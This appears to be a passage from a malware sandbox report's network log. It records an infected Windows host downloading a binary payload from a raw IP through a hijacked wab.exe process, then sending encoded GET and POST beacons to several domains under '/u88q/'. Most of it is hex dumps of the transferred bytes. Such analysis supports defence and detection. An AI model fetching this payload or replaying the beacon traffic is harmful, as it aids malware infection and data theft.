                                                Data Raw: 63 51 47 62 63 51 47 62 75 77 64 31 43 51 42 78 41 5a 76 72 41 72 55 79 41 31 77 6b 42 4f 73 43 2f 68 50 72 41 72 31 6d 75 59 71 37 30 6e 37 72 41 6a 62 47 36 77 49 35 44 34 48 70 70 61 55 44 45 2b 73 43 74 50 52 78 41 5a 75 42 36 65 55 56 7a 32 74 78 41 5a 76 72 41 76 7a 78 36 77 4b 34 37 65 73 43 63 39 2b 36 74 41 52 54 61 75 73 43 6c 2f 76 72 41 74 4f 79 63 51 47 62 63 51 47 62 4d 63 72 72 41 6f 6b 45 63 51 47 62 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4c 72 41 6a 73 68 36 77 4b 64 38 34 50 42 42 4f 73 43 64 55 48 72 41 68 75 68 67 66 6d 35 62 51 6b 42 66 4d 76 72 41 6e 6a 50 36 77 4c 4a 63 59 74 45 4a 41 54 72 41 6e 66 56 36 77 49 47 77 49 6e 44 36 77 4b 71 69 75 73 43 4f 71 75 42 77 36 43 68 68 67 42 78 41 5a 74 78 41 5a 75 36 70 55 45 61 2f 4f 73 43 52 78 58 72 41 6a 62 4c 67 63 4b 7a 66 5a 4c 34 63 51 47 62 36 77 4a 30 73 49 48 71 57 4c 2b 73 39 4f 73 43 4f 31 39 78 41 5a 74 78 41 5a 74 78 41 5a 74 78 41 5a 76 72 41 67 47 6c 69 77 77 51 63 51 47 62 36 77 4a 6e 4f 49 6b 4d 45 33 45 42 6d 33 [TRUNCATED]
                                                Data Ascii: cQGbcQGbuwd1CQBxAZvrArUyA1wkBOsC/hPrAr1muYq70n7rAjbG6wI5D4HppaUDE+sCtPRxAZuB6eUVz2txAZvrAvzx6wK47esCc9+6tARTausCl/vrAtOycQGbcQGbMcrrAokEcQGbiRQLcQGbcQGb0eLrAjsh6wKd84PBBOsCdUHrAhuhgfm5bQkBfMvrAnjP6wLJcYtEJATrAnfV6wIGwInD6wKqiusCOquBw6ChhgBxAZtxAZu6pUEa/OsCRxXrAjbLgcKzfZL4cQGb6wJ0sIHqWL+s9OsCO19xAZtxAZtxAZtxAZvrAgGliwwQcQGb6wJnOIkME3EBm3EBm0JxAZtxAZuB+vCyBAB11+sCo/BxAZuJXCQM6wJMnesCgRGB7QADAADrAo5acQGbi1QkCOsC8wzrAo5ai3wkBHEBm+sCQoyJ6+sCedRxAZuBw5wAAADrAnApcQGbU3EBm3EBm2pAcQGb6wJkL4nr6wLMb3EBm8eDAAEAAADwFQHrAqDt6wKrU4HDAAEAAOsCn0rrAiNLU+sCRSDrAjIJievrAnZhcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGb6wLZTVNxAZtxAZtq/+sC3jtxAZuDwgXrAl476wJpkjH26wJ+fnEBmzHJcQGb6wJO9IsacQGbcQGbQXEBm+sCGhI5HAp18+sCM6LrArTZRnEBm+sChTeAfAr7uHXccQGb6wKzE4tECvxxAZtxAZsp8HEBm+sC1OP/0nEBm+sCR+m68LIEAHEBm+sCZjUxwHEBm+sC5wWLfCQM6wKWgesCJouBNAfb8/yNcQGbcQGbg8AEcQGbcQGbOdB15nEBm+sCnfqJ++sCi+hxAZv/1+sCDorrAh4b4yt1aFKuFjbiaI87WgBt5WVzfX7XOpMlWjCgRYaS1VFQrhbYXjF1aGKD8uTEBDuKDtLy6+IqfXz1VIb9WgIJWRk7mggTyy0MKkCBXHzPbEqf/vz0JzF
                                                Apr 26, 2024 21:56:05.428417921 CEST1289INData Raw: 31 44 4b 2f 2b 2f 4d 39 75 74 49 57 30 43 33 4b 51 67 4e 76 2f 33 39 7a 41 63 70 43 41 32 39 7a 61 75 51 35 36 59 61 4c 5a 38 2f 79 31 50 6b 69 6d 53 4e 32 69 65 47 68 61 4d 4d 32 71 57 41 46 39 54 6e 72 4a 79 6d 52 61 41 4e 53 71 47 39 2f 39 56
                                                Data Ascii: 1DK/+/M9utIW0C3KQgNv/39zAcpCA29zauQ56YaLZ8/y1PkimSN2ieGhaMM2qWAF9TnrJymRaANSqG9/9VFBu04/b8zsITvL8jeQ6CgJaRmmM2/OdODJDfXYKMZnRWkZpjNvzISJGiX04TvL8jSAhfsgtMNa2Vmb9jdv8efUkDAMJGso/CSx3GAgTenn12vP8BEa//Y3byj8IGXIF3uIC/d4zY1SJ23cnBJ63eGJfORVpt/f8Al
                                                Apr 26, 2024 21:56:05.428436041 CEST1289INData Raw: 47 6c 65 4e 32 36 69 76 42 6b 5a 4d 2f 59 33 62 70 45 4e 7a 2b 47 70 62 44 44 53 36 45 52 49 47 63 67 74 34 74 4c 65 4e 44 44 54 39 33 36 54 4f 63 68 4d 70 5a 57 42 66 42 4d 52 65 62 4a 67 53 54 74 42 34 6b 58 30 56 63 76 6a 61 62 35 68 77 35 6f
                                                Data Ascii: GleN26ivBkZM/Y3bpENz+GpbDDS6ERIGcgt4tLeNDDT936TOchMpZWBfBMRebJgSTtB4kX0Vcvjab5hw5ojgTdbfOu15x1pyUMUSSEsNHHG0fm/TbKVfIICYTMGsFCGx8fzlVr9XntQ0w17b8/yN2/P8jdvz/I3SnqW3ndZVTGKRI8860mNIi3NsRxxcJrp6lV60cMZ9uf9LHqODctCpVhHV2hc1bTWDlKhIrTBnszbq1anRMsu
                                                Apr 26, 2024 21:56:05.428441048 CEST1289INData Raw: 75 37 53 43 4a 71 64 61 6c 67 79 49 76 34 35 45 74 49 2f 38 6b 51 56 4b 6d 77 68 55 75 31 41 55 62 2f 6f 48 75 68 31 72 4c 6b 6b 4c 70 33 63 43 42 4b 6f 65 48 4b 44 63 68 4d 48 32 73 2f 62 44 42 7a 67 35 73 68 73 70 48 63 77 6c 50 48 38 6a 59 70
                                                Data Ascii: u7SCJqdalgyIv45EtI/8kQVKmwhUu1AUb/oHuh1rLkkLp3cCBKoeHKDchMH2s/bDBzg5shspHcwlPH8jYpKBaNnBH182wsOJ1oCYbYi4n1MsBy0PlL60fQG+tIMj5XlAfzYruDYYhkCo0lBDKpiWIeuC/D4fYmQQIJ6ScfZ8/wz3/Wkn1oFltiEf317YkN1ShclUM9t30VXYsndJp32s27ZDqWbmpiRwtRsTNfEAfU2DXi1kUVy
                                                Apr 26, 2024 21:56:05.428455114 CEST1289INData Raw: 2b 6d 59 6a 71 54 4e 4b 44 32 4d 4a 56 56 6b 49 49 32 4a 38 57 77 7a 56 42 6d 54 6f 7a 62 38 7a 44 71 34 33 6b 4e 31 38 72 54 30 48 59 58 55 61 4f 69 71 53 6a 43 4f 55 45 38 53 44 78 73 67 45 6a 6c 68 49 6c 34 67 62 4d 54 34 6b 34 51 6f 55 61 66
                                                Data Ascii: +mYjqTNKD2MJVVkII2J8WwzVBmTozb8zDq43kN18rT0HYXUaOiqSjCOUE8SDxsgEjlhIl4gbMT4k4QoUafTWpeDCm2bWd6cj66CCkQDBmB2j/Uo2AEO/rsEL3KAv3SKUaucy1t65sicmYeCJ+K72LtV+wMKZnhchIsSCmTtAqrmggLqasykb1bY1oECB1ANH1K2UM/W1LMtC7qEV3Azu5dteNedKXqrNd9rZajDPfXkednCH2J/
                                                Apr 26, 2024 21:56:05.428498983 CEST1289INData Raw: 47 54 36 2b 73 63 6a 39 32 2b 73 79 31 42 4f 69 31 41 73 79 59 44 6e 49 39 61 54 59 38 6c 65 4a 4d 2f 35 69 52 41 72 79 42 58 2f 33 75 36 35 68 69 48 63 6b 43 76 49 68 37 7a 57 69 4c 6d 62 78 32 67 67 44 33 72 30 4a 41 55 58 55 43 54 4e 69 6f 4d
                                                Data Ascii: GT6+scj92+sy1BOi1AsyYDnI9aTY8leJM/5iRAryBX/3u65hiHckCvIh7zWiLmbx2ggD3r0JAUXUCTNioMDWErUBumN6CpOp1EFU/18iyRXA4tY1NHvj+/X17ukFJKVodYLZCRX17juur7Fo1rAeEnnWLJH5m7Uf+rQIg2EsXeAnBrWj8lG08SN7whRu/8d/z840CtfyN2/P8jdvz/I3b8+rKCkKsVQHgonb6ATpUQz/FgiAi7Y
                                                Apr 26, 2024 21:56:05.428533077 CEST1289INData Raw: 43 33 6e 49 5a 32 53 50 54 64 5a 4a 7a 67 75 2b 6c 2f 54 53 59 39 50 51 74 46 77 66 4f 76 46 48 39 75 35 71 4c 77 2f 79 6e 6b 53 42 65 6d 6c 6c 32 76 50 38 4e 30 55 63 6a 5a 33 55 38 2b 72 72 32 2f 50 38 6a 64 76 7a 2f 49 33 62 38 2f 79 4e 79 59
                                                Data Ascii: C3nIZ2SPTdZJzgu+l/TSY9PQtFwfOvFH9u5qLw/ynkSBemll2vP8N0UcjZ3U8+rr2/P8jdvz/I3b8/yNyYsHQNQZTsGnhoE6V7blMQnXeJwd0zHmGuCQYYBVfeMWb2E08T863X/0vZPClX5Tgrlwu6D7z7C31TLSv7cLS+qQKvPVza1INz208LXW+152UczlWgEb+EJ/rDXEHm9W7jwPlK/GaDEMfMlN9N52iKeAc9iIb3Vu0vB
                                                Apr 26, 2024 21:56:05.428544998 CEST1289INData Raw: 50 35 41 43 4d 56 63 75 74 64 71 57 2f 4a 77 78 76 51 66 65 6b 6c 41 32 76 50 38 4d 35 58 41 79 76 67 58 56 51 6a 6f 30 74 7a 79 72 58 30 67 6b 50 62 4d 76 36 6e 36 30 42 69 63 35 7a 2f 36 71 7a 4c 6a 42 44 4d 38 36 42 47 35 78 4f 41 72 48 62 58
                                                Data Ascii: P5ACMVcutdqW/JwxvQfeklA2vP8M5XAyvgXVQjo0tzyrX0gkPbMv6n60Bic5z/6qzLjBDM86BG5xOArHbXEXjwIzlaHc1oFzre8jDDS2Ptnl8xIk5b2vZpvl+/Onan8XAwt64LAqHI6EVMQeoLa4t6N2/P8jdvz/I3b8/yNiWJqHTEfmBk8GfW1m0XSxvk09W2tbapBB4xC0l8cF+8xUJcv4deajmZ3RwCCtBmW99znt3EhONcN
                                                Apr 26, 2024 21:56:05.428558111 CEST1289INData Raw: 50 38 6a 64 76 7a 2f 49 33 62 39 45 4f 39 6f 66 47 6d 69 4f 4c 57 63 36 48 4b 56 41 6e 44 71 70 74 4a 47 36 79 43 66 61 48 2f 76 48 50 55 4a 44 2b 4b 47 34 41 64 50 30 41 59 32 58 77 44 43 31 4a 44 36 67 2f 33 77 4c 5a 69 44 71 32 31 67 4a 69 6a
                                                Data Ascii: P8jdvz/I3b9EO9ofGmiOLWc6HKVAnDqptJG6yCfaH/vHPUJD+KG4AdP0AY2XwDC1JD6g/3wLZiDq21gJijxmKxuw8YgZ0uWsfYxgvxrdtltCO3pnIKlFCxNQw16tX1b3rC1hqHYpNMJo334me4vs3NrxJXWfgDEI6iDO/X0VrH0DCxtignVe1SZGQWcl9yzg7G15O1ksccTB7n99h2gtrlgI3b8/yN2/P8jdvz/IJVSgjXB2Gyr
                                                Apr 26, 2024 21:56:05.428603888 CEST1289INData Raw: 34 79 6f 6a 6b 57 67 4a 36 46 4d 65 32 66 55 77 64 61 32 49 78 46 35 56 30 32 75 49 76 74 2f 70 48 35 67 63 59 34 78 77 63 79 4e 79 7a 78 66 6b 6a 4e 62 32 6d 2f 62 65 64 75 34 65 78 38 70 5a 61 41 75 68 4b 49 2b 58 7a 53 75 4d 43 2f 49 33 62 38
                                                Data Ascii: 4yojkWgJ6FMe2fUwda2IxF5V02uIvt/pH5gcY4xwcyNyzxfkjNb2m/bedu4ex8pZaAuhKI+XzSuMC/I3b8/yN2/P8jdvz+7pv/pX/olIofkxMNB+PyPOMw/T8jdvz/I3b8/yN2/P/wwPPZ5PrjbdR64viV/Sl2y53T62CHMJMjdvz/I3b8/yN2/P8jRkfVdfG5D8ar11AeQNA10aryxiSikZ3AILx/I2KShZpEP19ZFOGFpdaAh
                                                Apr 26, 2024 21:56:05.660674095 CEST1289INData Raw: 38 53 6a 59 68 2f 66 74 44 58 48 6b 33 67 4b 4d 4e 38 6f 4b 52 31 45 78 70 49 30 55 4a 42 4d 46 58 43 43 69 6d 72 51 4b 71 58 68 6a 68 50 7a 39 6b 36 50 7a 2f 49 33 62 38 2f 79 4e 32 2f 50 38 6a 64 76 67 59 78 53 48 4b 61 4b 78 4d 76 44 45 2f 33
                                                Data Ascii: 8SjYh/ftDXHk3gKMN8oKR1ExpI0UJBMFXCCimrQKqXhjhPz9k6Pz/I3b8/yN2/P8jdvgYxSHKaKxMvDE/3kh/p4MLmxF60EtX9uekoghrucqmhRhjhh4sZFhBe/OgxunxN/zdcj/okUUSVdhDCr2cNiLcg1HUJalDBrmfeaweuVQiXE+60F3pTpxqAsVCcHCYMdVpQRGrf6N20icPrNAfX6AiikcikpApFe1fUy60VxzWgJayR0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.64970787.121.105.163801436C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 26, 2024 21:56:28.537935972 CEST174OUTGET /AKaUDBTG140.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: 87.121.105.163
                                                Cache-Control: no-cache
                                                Apr 26, 2024 21:56:28.773897886 CEST1289INHTTP/1.1 200 OK
                                                Date: Fri, 26 Apr 2024 19:56:28 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Last-Modified: Fri, 26 Apr 2024 06:31:14 GMT
                                                ETag: "41c40-616fa0ce17080"
                                                Accept-Ranges: bytes
                                                Content-Length: 269376
                                                Content-Type: application/octet-stream
                                                Data Raw: 72 d5 9c 98 e0 30 bd 53 f7 8e d5 94 62 67 11 e1 b8 f5 22 ce 64 35 a8 3a 78 4e d8 7c 5e 56 8d 58 b9 3d 40 8c 10 37 a5 03 a3 ca 1d b4 8f a7 24 8a dc 00 7c 45 df 6a 77 74 63 29 59 37 62 f1 78 d4 06 51 2e f5 05 35 16 4b 6c 10 b1 55 9b 40 13 ea 07 6c 10 b8 29 32 38 62 13 7a b5 47 8c cd 56 51 8d a6 6e 70 c3 75 64 2d fe 7c f0 a9 08 71 b3 7c 3d 2f 1c fc f9 b4 b5 43 ed d5 2b ce f2 a6 c6 98 6e e0 aa 28 a6 8e ed 00 d6 dd c3 8c 8f 80 2d b6 c5 e8 de 55 71 ca 44 5f c1 d2 af a8 06 4f 3b 76 b2 4f 87 b1 b6 ef 11 38 0f d4 b4 75 92 de 23 89 6d cb 57 25 72 cf a5 f0 86 b6 e2 82 ce 02 b8 1f 93 75 94 dd b2 aa 77 55 1a 46 a5 89 e1 25 c6 e4 fa 6f 06 dc ca c4 1c 6f ee 49 f1 d4 e6 c8 c5 a2 a7 6f da 3e d5 27 40 eb e0 62 42 8a 0a eb 84 60 2e ee 59 ea 8d a3 ae 09 79 de 6c c8 5d 97 e4 98 34 cb e0 10 0f 19 cb c9 2f 8b 1e 15 b7 b8 ed 8b 26 1d 2d a8 c5 ff 30 8a 88 99 69 42 61 cd bc 2b f1 1f fb 57 be e6 76 68 8b bc fa d0 f1 18 72 84 d5 d4 10 a1 5a 39 c1 b6 3e ff 86 de 35 93 50 ad 53 61 5d dd ac db 4b 3d 3f 38 fe 65 a0 b8 1c bf 01 86 [TRUNCATED]
                                                Data Ascii: r0Sbg"d5:xN|^VX=@7$|Ejwtc)Y7bxQ.5KlU@l)28bzGVQnpud-|q|=/C+n(-UqD_O;vO8u#mW%ruwUF%ooIo>'@bB`.Yyl]4/&-0iBa+WvhrZ9>5PSa]K=?8eRT8vS<`%yB?: JGcD(}jyU'e1#-IYOfCpo7uM`eOKRR7hMeKI1MmZzH"W6;gP22jFnLYYwt(M|{M0(XQx5rJq):".SVoA=p7{zI,hS}c>0k\jTIm=<t$Nu:$Z_Ftxd\92+% ?hMJo$Gh>@2lxc#=LDF#ZNrEy<Q(r7y08>wslZ@<G?P}d]tGU"||=&q1`lO]H@#g:?.'X{yZy>Z3/RvU!c5o]cdQVY}s@60`;ZG'w6Rn%]khD:a07/gazcTXH [TRUNCATED]
                                                Apr 26, 2024 21:56:28.773915052 CEST1289INData Raw: 87 42 d3 02 24 0f 15 3b 91 0c 11 0d 26 6a e1 02 b0 09 25 16 d8 43 d5 b4 1d ce ee bb 9f e1 c4 62 50 37 71 21 54 5e a6 59 9e 48 3a 33 5c 09 ee 35 31 e5 22 65 36 83 1f ba 3a 71 d0 a5 47 84 63 41 26 6c cf d6 6d 9f 1a 3b 35 ab 99 a6 2d 49 b6 69 e1 61
                                                Data Ascii: B$;&j%CbP7q!T^YH:3\51"e6:qGcA&lm;5-IiaAV23~ 8uR8rO75FH?fbkpq}japEG"E!07N 5i-kTG<eWKJ4Hp(gN{{vQe
                                                Apr 26, 2024 21:56:28.773929119 CEST1289INData Raw: 7f 8f a3 94 cf a4 b4 2b 25 20 d5 3f 00 17 68 d9 4d 4a 6f 95 e5 b6 03 24 f5 7f 8f 08 aa 47 04 68 3e e7 40 99 32 9f d9 a0 6c 00 f0 d5 78 a9 ce 63 11 c7 23 fd 1c 3d ff d9 4c ba 44 f6 46 87 df d1 a5 d8 23 fe 5a 4e d0 f6 9e 9b 72 b0 bc b2 45 79 9a 3c
                                                Data Ascii: +% ?hMJo$Gh>@2lxc#=LDF#ZNrEy<Q(r7y08>wslZ@<G?P}d]tGU"||=&q1`lO]H@#g:?.'X{yZy>Z3/RvU!c5o]c
                                                Apr 26, 2024 21:56:28.773942947 CEST1289INData Raw: 8b 9c fe d0 f1 18 32 84 d5 c4 10 a1 5a 3b c1 b6 38 ff 86 de 35 93 50 ad 55 61 5d dd ac db 4b 3d 3f 18 fa 65 a0 ba 1c bf 01 86 52 f2 56 38 36 0f b8 53 e1 3c 18 9f 60 f3 25 e5 69 a0 91 cd d5 42 f2 3f 3a 9f 30 82 4a 02 1b b0 47 63 44 9f 28 ad ea 7f
                                                Data Ascii: 2Z;85PUa]K=?eRV86S<`%iB?:0JGcD(}jyU'e1#-IYOfCpo7uM`eOKRR7hMeKI1MmZzH"W6;gP22jF{qnLPYw~,M|{M0(X
                                                Apr 26, 2024 21:56:28.773957014 CEST1289INData Raw: 30 dd f9 3a df 01 7f 9f ef f5 25 2f 0a 12 9b 70 35 e2 b8 65 47 08 9f a0 4a 10 90 cc fd b1 15 68 8f 59 4e b6 11 a5 d6 cc 1a 9d 7f fa 62 48 9a 66 0f 91 1f d7 c2 ee db 15 e1 38 ae 05 fe c2 22 66 1c e5 03 ab df 1d 8b 3d 77 7d 7b de aa 8c 77 d9 4f b2
                                                Data Ascii: 0:%/p5eGJhYNbHf8"f=w}{wOF+s0nI4<~A0=e:G4"U"tOMdpD:N_M:2#&5whM9d-HFq4HKhn&c/ncB\,nWkdY'._.Q
                                                Apr 26, 2024 21:56:28.773969889 CEST1289INData Raw: b9 72 1c c5 92 3f a1 8f bf 9d e7 27 a8 d2 4c 73 00 ea 5f 21 a7 c7 ba 19 9b a8 f8 ef c0 c4 cb f7 b5 3c cb b7 30 05 25 79 64 40 57 2e 65 e8 ae 64 31 c7 12 7f 57 08 61 7b 0a 93 76 8f 2c 76 6c 1b ae 06 26 d9 ec 59 a1 d3 b4 77 b7 e1 5a bc 0e 35 83 93
                                                Data Ascii: r?'Ls_!<0%yd@W.ed1Wa{v,vl&YwZ5,}Bxve,]5}}MI0F('SJZ5i_Z|R\]S2h=B~\WNiAsK%]a8]@1-~wK{'7:X$t:
                                                Apr 26, 2024 21:56:28.773983002 CEST1289INData Raw: 1e dd bd 10 34 f9 06 7b 6c 9d 88 94 79 d7 b8 5d 48 5b cc e4 c1 fd f0 e2 e4 ad c0 d5 6f e4 8a 39 7a 4a 3e 27 58 7b be 1f 70 dd 25 e0 5a ba 72 f0 95 94 78 2f 09 f9 f6 dc 7c fc a4 f1 a2 35 62 6f 5d 02 e3 93 b3 46 f7 1a 8f 1b 8c d6 64 68 0b 0c a8 9b
                                                Data Ascii: 4{ly]H[o9zJ>'X{p%Zrx/|5bo]Fdh}_0X'm_0`DNMu&J oD?:,gBa![f PD`A`rAWAw7#p6JiB'`[-_%0
                                                Apr 26, 2024 21:56:28.773999929 CEST1289INData Raw: 2f bd fb bc e9 49 b3 f5 5a 7a f0 21 ba a5 9c c1 d2 64 c9 da 7c 57 24 f8 f3 83 59 b4 68 bd 90 f8 23 03 c7 b2 90 22 1a 1d 9f 96 67 8e 9a 2c b2 d9 dd 01 26 d3 09 8f 27 48 ee 07 81 7c 7c d7 6f 36 53 96 10 74 a7 d6 78 1c 77 7e e8 68 35 fd 72 70 14 74
                                                Data Ascii: /IZz!d|W$Yh#"g,&'H||o6Stxw~h5rptIy2NVo'/%BcZrc9J_Qr;`bby<h}u+TiPH:IftN;4vFeZ_olK9F|_-&D1(^M(U8M]%%+J>=t'.8;
                                                Apr 26, 2024 21:56:28.774288893 CEST1289INData Raw: 95 98 27 7a 81 64 2d fe c3 a9 a9 08 71 8a 21 31 5b 35 65 7a 56 8a 40 2f 14 d3 c8 cf 66 b3 6b 59 a2 00 53 86 03 b9 d5 82 7e 7a a0 28 a1 79 64 39 9b fe 25 38 6f 2c 61 6a f7 fa 33 38 7f 66 d9 9d e4 00 89 55 16 29 5a a4 fc e6 56 17 18 35 55 b8 9f 54
                                                Data Ascii: 'zd-q!1[5ezV@/fkYS~z(yd9%8o,aj38fU)ZV5UT@\{<{MAW$$."+!3:e%.Qq~&m\.,B5})*'Yz@S[xM7cHO|lSZb8>5P a`~K2sU
                                                Apr 26, 2024 21:56:28.774306059 CEST1289INData Raw: 10 8a a7 ef 28 b6 f2 be 2a 17 68 49 b3 2c 89 b8 fb f2 c3 00 48 94 ae 89 56 6b c9 08 f7 97 5a 98 d3 e1 68 c4 57 d9 60 c0 d8 fa 17 9d 5f 76 1c 2d be ab 75 92 08 af 5e 62 cf 8a 80 ef b3 fc 63 a5 1a 6b 89 a7 78 58 19 1d ef 08 c9 a5 47 2c 71 b1 06 c1
                                                Data Ascii: (*hI,HVkZhW`_v-u^bckxXG,q$0!~;=MWTG@nv58JiOnYzPrQN<95~-mQexdT7ei'p5szd?JlhxXv
                                                Apr 26, 2024 21:56:29.006644964 CEST1289INData Raw: 92 1f 38 b5 23 56 c8 df 27 13 b4 ca 0a 96 b6 e2 c8 5a 88 70 d7 1c ca 0c cd a2 62 1f 10 ce e8 5a 9e d7 12 e0 1d b4 7f 37 e1 02 5b 0a a8 5f d8 fb e4 b8 de fe 19 52 5e 1b c1 e9 9a f6 98 3e 57 94 d3 b4 ad 88 b3 76 a4 30 ab 25 3e 63 9d 65 36 83 4c 31
                                                Data Ascii: 8#V'ZpbZ7[_R^>Wv0%>ce6L1gyhcA&m_7-kaDJ3&eg~^Rl1{froAh&u| ~N>]i1#0g\1kW7??eWg~ s


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.64971145.194.181.142806448C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 26, 2024 21:57:40.380347013 CEST456OUTGET /u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jackcliu.com
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
                                                Apr 26, 2024 21:57:49.496485949 CEST193INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 26 Apr 2024 19:57:49 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.64971223.82.11.73806448C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 26, 2024 21:57:57.259561062 CEST739OUTPOST /u88q/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Host: www.smartfindsdepot.shop
                                                Origin: http://www.smartfindsdepot.shop
                                                Content-Length: 209
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                Referer: http://www.smartfindsdepot.shop/u88q/
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
                                                Data Raw: 4a 44 31 78 3d 49 6c 59 65 4a 53 4c 55 33 55 47 4f 4d 6b 56 53 62 56 71 48 4f 6b 6a 70 78 75 6f 7a 78 38 5a 39 6b 4a 78 77 7a 30 69 39 6e 68 53 53 4a 44 65 74 57 51 47 6d 46 46 49 2f 77 64 63 75 4c 64 49 34 4a 43 47 57 52 72 67 44 6b 75 43 67 46 49 75 74 47 31 52 56 4b 72 52 37 74 55 70 46 6a 34 64 73 70 54 2b 54 31 4e 4f 31 70 6a 4f 5a 53 6d 69 4e 54 59 32 37 6e 48 54 2b 69 53 32 75 6c 75 5a 59 58 75 6a 35 38 69 68 58 71 73 37 58 4b 6f 79 74 36 43 6e 34 58 61 71 43 31 37 53 46 52 61 35 65 61 57 71 59 34 51 7a 7a 58 37 36 44 73 42 33 58 65 72 4a 74 54 6f 6e 72 31 79 4b 5a 71 59 51 36 4d 64 4b 4d 45 6a 73 61 54 66 41 57
                                                Data Ascii: JD1x=IlYeJSLU3UGOMkVSbVqHOkjpxuozx8Z9kJxwz0i9nhSSJDetWQGmFFI/wdcuLdI4JCGWRrgDkuCgFIutG1RVKrR7tUpFj4dspT+T1NO1pjOZSmiNTY27nHT+iS2uluZYXuj58ihXqs7XKoyt6Cn4XaqC17SFRa5eaWqY4QzzX76DsB3XerJtTonr1yKZqYQ6MdKMEjsaTfAW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.64971323.82.11.73806448C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 26, 2024 21:57:59.947913885 CEST763OUTPOST /u88q/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Host: www.smartfindsdepot.shop
                                                Origin: http://www.smartfindsdepot.shop
                                                Content-Length: 233
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                Referer: http://www.smartfindsdepot.shop/u88q/
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
                                                Data Raw: 4a 44 31 78 3d 49 6c 59 65 4a 53 4c 55 33 55 47 4f 4d 45 6c 53 49 32 43 48 5a 55 6a 71 39 4f 6f 7a 34 63 5a 68 6b 4a 39 77 7a 78 44 6d 6e 53 36 53 4a 6d 69 74 52 53 2b 6d 51 46 49 2f 36 39 63 72 47 39 49 4a 4a 43 4c 6c 52 71 63 44 6b 75 47 67 46 4a 65 74 47 43 6c 57 4c 37 51 64 6c 30 70 48 73 59 64 73 70 54 2b 54 31 4e 4c 59 70 6a 57 5a 54 58 53 4e 52 35 32 36 6b 48 54 35 72 79 32 75 68 75 5a 63 58 75 6a 58 38 6a 38 38 71 76 50 58 4b 70 43 74 36 54 6e 2f 64 61 71 49 37 62 54 42 59 4a 67 4e 41 31 47 66 30 47 76 68 58 62 62 35 6b 58 32 4e 43 59 4a 4f 42 34 48 70 31 77 53 72 71 34 51 51 4f 64 79 4d 57 30 67 39 63 72 6c 31 67 58 4d 62 38 45 75 34 72 49 46 72 59 33 6c 39 6e 65 56 42 50 67 3d 3d
                                                Data Ascii: JD1x=IlYeJSLU3UGOMElSI2CHZUjq9Ooz4cZhkJ9wzxDmnS6SJmitRS+mQFI/69crG9IJJCLlRqcDkuGgFJetGClWL7Qdl0pHsYdspT+T1NLYpjWZTXSNR526kHT5ry2uhuZcXujX8j88qvPXKpCt6Tn/daqI7bTBYJgNA1Gf0GvhXbb5kX2NCYJOB4Hp1wSrq4QQOdyMW0g9crl1gXMb8Eu4rIFrY3l9neVBPg==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.64971423.82.11.73806448C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 26, 2024 21:58:03.745702028 CEST1776OUTPOST /u88q/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Host: www.smartfindsdepot.shop
                                                Origin: http://www.smartfindsdepot.shop
                                                Content-Length: 1245
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                Referer: http://www.smartfindsdepot.shop/u88q/
